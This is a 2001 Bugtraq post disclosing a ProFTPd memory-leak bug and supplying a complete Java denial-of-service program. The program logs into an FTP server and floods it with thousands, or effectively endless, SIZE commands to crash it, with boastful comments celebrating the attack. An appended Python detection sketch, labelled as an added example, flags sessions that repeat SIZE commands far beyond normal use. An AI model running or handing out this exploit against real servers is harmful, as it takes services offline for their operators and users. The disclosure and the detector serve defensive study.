Memory leakage in ProFTPd leads to remote DoS (SIZE FTP); (Exploit Code)
Date: Tue, 9 Jan 2001 18:50:53 +0100
From: JeT Li <jet_li_man@yahoo.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Memory leakage in ProFTPd leads to remote DoS (SIZE FTP); (Exploit Code)
Hello Bugtraq:
Not long ago a ProFTPd remote vulnerability was released:
"ProFTPd has a memory leakage bug when it executes the SIZE FTP command. By
calling the FTP command SIZE 5000 times it is possible to cause ProFTPd to
consume over 300kB of memory. Exploiting this bug with more SIZE commands
gives us a simple DoS attack. Anonymous access is sufficient to use SIZE
commands and to exploit this bug."
I have coded a program that makes more than 5000 SIZE requests to the
server, in order to crash it. Why in Java? Well, I think the procedure is
simple enough that there is no need to code it in C. In addition, why not in
Java? ;-) We don't need various versions of the program for Linux, BSD,
Solaris, etc; there is a single program for all the OSes and architectures.
I wanna bet in favor of the use of Java to code next generation xploits & DoS ;-)
Vulnerability: Remote DoS in ProFTPd
Requirements: Anonymous or normal user access
Vulnerable systems:
ProFTPd 1.2.0rc1 (Tested)
ProFTPd 1.2.0rc2 (Tested)
And maybe others (1.2.0preX); I have not tested this, but I'm sure you can
do it for me ;-)
And now, here is the code:
proftpDoS.java
-----------------------
/* Remote DoS in proFTPd
Code by: JeT-Li -The Wushu Master- jet_li_man@yahoo.com
Well here is a little explanation about the concept of the DoS:
ProFTPd has memory leakage bug when it executes the SIZE FTP command. By
calling the FTP command SIZE 5000 times it possible to cause ProFTPd
to consume over 300kB of memory. Exploiting this bug with more SIZE
commands gives us simple DoS attack. Anonymous access is
sufficient to use SIZE commands and to exploit this bug.
You don't have to give arguments when you execute the program, it will
request you these.
Greets: _kiss_ (the real fucker ;-P); gordoc (no comment, the most
hax man in the w0rld); Perip|o (tibetan mantras for u! ;-P); and all
the ppl of #hackers (not able for cardiac XD).
Vulnerable systems:
ProFTPd 1.2.0rc1 (Tested)
ProFTPd 1.2.0rc2 (Tested)
And maybe others (1.2.0preX); I have no test this, but I'm sure you can
do it for me ;-)
*/
import java.net.*;
import java.io.*;

class TCPconnection {
    public TCPconnection (String hostname, int portnumber) throws Exception {
        Socket s = doaSocket(hostname, portnumber);
        br = new BufferedReader (new InputStreamReader (s.getInputStream()));
        ps = new PrintStream (s.getOutputStream());
    }

    public String readLine() throws Exception {
        String s;
        try { s = br.readLine(); }
        catch (IOException ioe) {
            System.out.println("TCP Error ... it's a little hax0r exception ;-)");
            throw new Exception ("\nInput Error: I/O Error");
        }
        return s;
    }

    public void println(String s) {
        ps.println(s);
    }

    private Socket doaSocket(String hostname, int portnumber) throws Exception {
        Socket s = null;
        int attempts = 0;
        while (s == null && attempts<maxattempts) {
            try { s = new Socket(hostname, portnumber); }
            catch (UnknownHostException uhe) {
                System.err.println("It was no posible to establish the TCP connection.\n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
                throw new Exception("\nConnection Error: " + "unknown hostname");
            }
            catch (IOException ioe) {
                System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
            }
            attempts++;
        }
        if (s == null) throw new IOException("\nThe connection was not accomplished due to an I/O Error: trying it again ...");
        else return s;
    }

    private final int maxattempts = 5;
    private BufferedReader br;
    private PrintStream ps;
}

class proftpDoS {
    public static void main(String[] arg) throws Exception {
        InputStreamReader isr;
        BufferedReader tcld;
        String hostnamez, username, password, file, s1, option;
        int i, j, k;
        isr = new InputStreamReader(System.in);
        tcld = new BufferedReader(isr);
        System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
        System.out.println("Code in an attempt to solve Fermat Last's Theoreme");
        hostnamez = "";
        while (hostnamez.length()==0) {
            System.out.print("Please enter the hostname/IP: ");
            hostnamez = tcld.readLine();
        }
        username = "";
        while (username.length()==0) {
            System.out.print("Enter the username: ");
            username = tcld.readLine();
        }
        password = "";
        while (password.length()==0) {
            System.out.print("Enter the password for that username: ");
            password = tcld.readLine();
        }
        file = "";
        while (file.length()==0) {
            System.out.print("Enter a valid filename on the FTP \n(with correct path of course ;-): ");
            file = tcld.readLine();
        }
        System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");
        System.out.println("1) Request 10000 size's to the server (it may be enough)");
        System.out.println("2) \"No pain no gain\" (pseudo-eternal requests, ey it may be harm ;-P)");
        System.out.print("Option: ");
        option = tcld.readLine();
        k = Integer.parseInt(option);
        while (!(k==1 || k==2)) {
            System.out.print("Option not valid, please try again: ");
            option = tcld.readLine();
            k = Integer.parseInt(option);
        }
        TCPconnection tc = new TCPconnection(hostnamez, 21);
        tc.println("user " + username);
        tc.println("pass " + password);
        if (k==1) {
            for(i=0;i<10000;i++)
                tc.println("size " + file);
        }
        else if (k==2) {
            for(i=1;i<100;i++)
                for(j=2;j<((int)Math.pow(j,i ));j++)
                    tc.println("size " + file);
        }
        tc.println("quit");
        s1 = tc.readLine();
        while (s1!=null) {
            s1 = tc.readLine();
            System.out.println("Attack completed ... as one of my friends says:");
            System.out.println("Hack just r0cks ;-)");
        }
    }
}
-----------------------
Well, that's all folks ;-) Sorry for my poor English, you can send any
dude or whatever you want to: jet_li_man@yahoo.com
JeT Li -The Wushu Master-
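Added example, not part of the original post or of ProFTPd: a detection sketch in Python that counts SIZE commands per FTP session in a command log and flags sessions that repeat it far beyond normal client behaviour. The log line layout, the sample lines, the addresses and the 1000-command threshold are all constructed assumptions; adapt the regular expression to whatever your server actually logs.

```python
import re
from collections import defaultdict

# Assumed, constructed line layout (not a ProFTPd default):
#   <epoch-seconds> <client-ip> <session-pid> <FTP command> [argument]
LINE_RE = re.compile(r"^(\d+) (\S+) (\d+) ([A-Za-z]+)(?: (.*))?$")

def find_size_floods(lines, max_size_cmds=1000):
    """Return one alert per session that sent more than max_size_cmds SIZE commands."""
    sessions = defaultdict(lambda: {"count": 0, "first": 0, "last": 0, "args": set()})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not fit the assumed layout
        ts, ip, pid, cmd, arg = m.groups()
        if cmd.upper() != "SIZE":  # FTP command names are case-insensitive
            continue
        s = sessions[(ip, pid)]
        s["first"] = s["first"] or int(ts)
        s["last"] = int(ts)
        s["count"] += 1
        s["args"].add(arg)
    alerts = []
    for (ip, pid), s in sorted(sessions.items()):
        if s["count"] <= max_size_cmds:
            continue
        seconds = max(s["last"] - s["first"], 1)  # avoid dividing by zero
        alerts.append({
            "ip": ip, "pid": pid, "size_cmds": s["count"],
            "per_second": round(s["count"] / seconds, 1),
            # one path repeated thousands of times is the pattern described above;
            # a mirroring client would query many different paths
            "distinct_paths": len(s["args"]),
        })
    return alerts

def build_sample_log():
    """Constructed input: one ordinary session and one repeating SIZE 5000 times."""
    log = ["978976200 192.0.2.10 4101 USER anonymous",
           "978976201 192.0.2.10 4101 SIZE pub/README",
           "978976202 192.0.2.10 4101 RETR pub/README",
           "978976203 192.0.2.10 4101 QUIT",
           "978976210 198.51.100.7 4102 USER anonymous"]
    log += [f"{978976211 + i // 250} 198.51.100.7 4102 size pub/README" for i in range(5000)]
    return log

if __name__ == "__main__":
    for alert in find_size_floods(build_sample_log()):
        print(alert)
```

Because the leak accumulates per server process, counting per session rather than per source address is what ties the alert to the memory growth the advisory describes.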